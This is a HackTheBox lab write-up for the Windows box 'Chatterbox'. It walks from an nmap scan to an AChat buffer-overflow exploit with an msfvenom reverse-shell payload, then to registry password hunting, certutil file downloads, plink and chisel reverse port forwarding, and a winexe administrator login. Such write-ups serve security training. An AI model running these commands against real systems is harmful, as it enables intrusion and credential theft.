Hackthebox - Chatterbox

Windows

Box on HTB

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.74              
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 07:47 EDT
Nmap scan report for 10.10.10.74
Host is up (0.022s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/2%OT=135%CT=1%CU=38815%PV=Y%DS=2%DC=T%G=Y%TM=6248383
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=FE%TI=I%CI=I%II=I%SS=S%TS=7)
OS:OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M505
OS:NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h22m42s, deviation: 2h18m34s, median: 5h02m41s
| smb2-time: 
|   date: 2022-04-02T16:51:53
|_  start_date: 2022-04-02T16:29:48
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-04-02T12:51:52-04:00

TRACEROUTE (using port 23/tcp)
HOP RTT      ADDRESS
1   23.16 ms 10.10.14.1
2   23.35 ms 10.10.10.74

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.78 seconds

Initial access

AChat

With some research on this program it seems to be a buffer overflow, there's an exploit made for it here
Let's get the exploit on our machine wget https://www.exploit-db.com/raw/36025
We just need to change the payload and do this instead because we want to get a reverse shell (not launch calc as the exploit payload is doing):

msfvenom -a x86 --platform Windows -p 'windows/shell_reverse_tcp' LHOST=10.10.14.4 LPORT=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Now we can replace the buffer in the exploit script with our buffer, we also need to change the server adress with the ip of the target 10.10.10.74
We launch the python script (wont work with python3 we need to use python2)
We get a shell

whoami
chatterbox\alfred

Let's get the user flag

cd C:\Users\Alfred\Desktop
type user.txt

Post Attack Enumeration

systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          4/2/2022, 12:29:38 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,574 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,643 MB
Virtual Memory: In Use:    452 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
[STRIPPED]
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74

net users

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator            Alfred                   Guest                    
The command completed successfully.

net localgroup

Aliases for \\CHATTERBOX

-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Replicator
*Users
The command completed successfully.

netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       356
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       904
  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING       456
  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING       1032
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       464
  TCP    10.10.10.74:139        0.0.0.0:0              LISTENING       4
  TCP    10.10.10.74:9255       0.0.0.0:0              LISTENING       3100
  TCP    10.10.10.74:9256       0.0.0.0:0              LISTENING       3100
  TCP    10.10.10.74:49158      10.10.14.4:1234        ESTABLISHED     3100
  TCP    [::]:135               [::]:0                 LISTENING       664
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       356
  TCP    [::]:49153             [::]:0                 LISTENING       716
  TCP    [::]:49154             [::]:0                 LISTENING       904
  TCP    [::]:49155             [::]:0                 LISTENING       456
  TCP    [::]:49156             [::]:0                 LISTENING       1032
  TCP    [::]:49157             [::]:0                 LISTENING       464
  UDP    0.0.0.0:123            *:*                                    872
  UDP    0.0.0.0:500            *:*                                    904
  UDP    0.0.0.0:4500           *:*                                    904
  UDP    0.0.0.0:5355           *:*                                    1104
  UDP    10.10.10.74:137        *:*                                    4
  UDP    10.10.10.74:138        *:*                                    4
  UDP    10.10.10.74:1900       *:*                                    3384
  UDP    10.10.10.74:9256       *:*                                    3100
  UDP    10.10.10.74:59445      *:*                                    3384
  UDP    127.0.0.1:1900         *:*                                    3384
  UDP    127.0.0.1:59446        *:*                                    3384
  UDP    [::]:123               *:*                                    872
  UDP    [::]:500               *:*                                    904
  UDP    [::]:4500              *:*                                    904
  UDP    [::1]:1900             *:*                                    3384
  UDP    [::1]:59444            *:*                                    3384

The established connection is my reverse shell
On the top we see some local port that open including 445 which is smb so a share might be available locally
Let's check for passwords using this findstr /si password *.txt *.ini *.config *.sql - we do not seem to get anything
Let's try with the registry reg query HKLM /f password /t REG_SZ /s We get something interesting, we have a default password!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

Let's check winlogon further

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x11
    DefaultDomainName    REG_SZ    
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked

Let's try to use the password on the local smb, but first we need to do some port forwarding
We need to get plink in our attacking machine and transfer it to the target
- wget https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe
- python3 -m http.server 80
- In our target we browse to a directory where we have write access (Alfred's desktop for instamnce) and we get plink certutil.exe -urlcache -f http://10.10.14.4/plink.exe plink.exe
We are going to launch ssh in our kali in our /etc/ssh/sshd_config PermitRootLogin should be set to yes PermitRootLogin yes
service ssh start
Now we can port forward smb with plink from our target machine: plink.exe -l root -pw your-kali-password-here -R 445:127.0.0.1:445 10.10.14.4
- For more infor on this check out this article by UY
For some reason I am not able to connect to my own machine using ssh so I gonna try with chisel
On my kali chisel server --reverse (it going to listen on port 8080)
On the target .\chisel.exe client 10.10.14.4:8080 R:445:127.0.0.1:445
It seems to work
Now we can use winexe from our machine and connect with administrator using the discovered password winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
And we get a root shell!
And we can grab the root flag

PreviousHackthebox - Bastion NextHackthebox - Devel

Last updated 2 years ago